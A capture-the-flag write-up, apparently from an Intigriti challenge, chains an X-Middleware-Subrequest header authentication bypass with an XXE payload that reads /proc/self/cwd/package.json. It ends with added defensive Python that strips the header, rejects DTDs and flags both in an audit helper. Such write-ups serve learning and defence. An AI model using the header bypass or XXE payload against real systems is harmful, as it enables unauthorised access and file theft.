Description:
The challenge was solved by chaining an authentication bypass with an XXE vulnerability. Adding the HTTP header X-Middleware-Subrequest: middleware made the application treat the request as an internal middleware subrequest and grant access to restricted admin functionality without authentication. This exposed internal features that would normally require admin privileges. With that access, an XML External Entity (XXE) payload was submitted to an XML-processing endpoint. The payload read package.json from the application's current working directory via the /proc/self/cwd symlink (/proc/self/cwd/package.json). The file contained the challenge flag, confirming that both the authentication bypass and the XXE were successfully exploited.
POC:
1. I have bypassed the login with this header X-Middleware-Subrequest: middleware and directly accessed the admin area.

2. Click on Ice Cream Machines, then click on View Settings.


3. I have used this payload in the XML Configuration Settings:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///proc/self/cwd/package.json">
]>
<stockCheck><productId>&xxe;</productId></stockCheck>

4. Finally, grab the flag.
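As an added defensive example (not code from the challenge or from this writeup), the Python below shows the two checks that would have broken this chain: dropping client-supplied copies of the internal X-Middleware-Subrequest header before routing, and refusing any XML that declares a DTD before the stock-check parser ever sees it, plus an audit helper that flags both conditions for logging. The header name, element names and payload come from the writeup; the function names and sample host are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Internal-only header the challenge's middleware trusted from clients (name from the writeup).
INTERNAL_HEADERS = {"x-middleware-subrequest"}

# A stock check never needs a DTD, so any DOCTYPE/ENTITY declaration is rejected outright.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed sample inputs: the writeup's payload and a benign request.
XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    "<!DOCTYPE foo [\n"
    '<!ENTITY xxe SYSTEM "file:///proc/self/cwd/package.json">\n'
    "]>\n"
    "<stockCheck><productId>&xxe;</productId></stockCheck>"
)
SAFE_XML = "<stockCheck><productId>42</productId></stockCheck>"
BYPASS_HEADERS = {"Host": "shop.example", "X-Middleware-Subrequest": "middleware"}


def strip_internal_headers(headers):
    """Drop client-supplied copies of internal headers before routing (edge/proxy fix)."""
    return {k: v for k, v in headers.items() if k.lower() not in INTERNAL_HEADERS}


def parse_stock_check(xml_text):
    """Read productId from a stock check; refuses any document that declares a DTD."""
    if DTD_MARKER.search(xml_text):
        raise ValueError("DTD or entity declaration in XML body")
    root = ET.fromstring(xml_text)
    if root.tag != "stockCheck":
        raise ValueError("unexpected root element")
    node = root.find("productId")
    if node is None or not node.text:
        raise ValueError("productId missing")
    return node.text.strip()


def audit_request(headers, body):
    """Detection side: return the reasons a request matches this chain, for logging or alerting."""
    reasons = []
    for name in headers:
        if name.lower() in INTERNAL_HEADERS:
            reasons.append(f"client-supplied internal header: {name}")
    if DTD_MARKER.search(body):
        reasons.append("DTD or entity declaration in XML body")
    return reasons
```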
Flag: INTIGRITI{XXE_Redacted_M4ch1n3s}

Reference: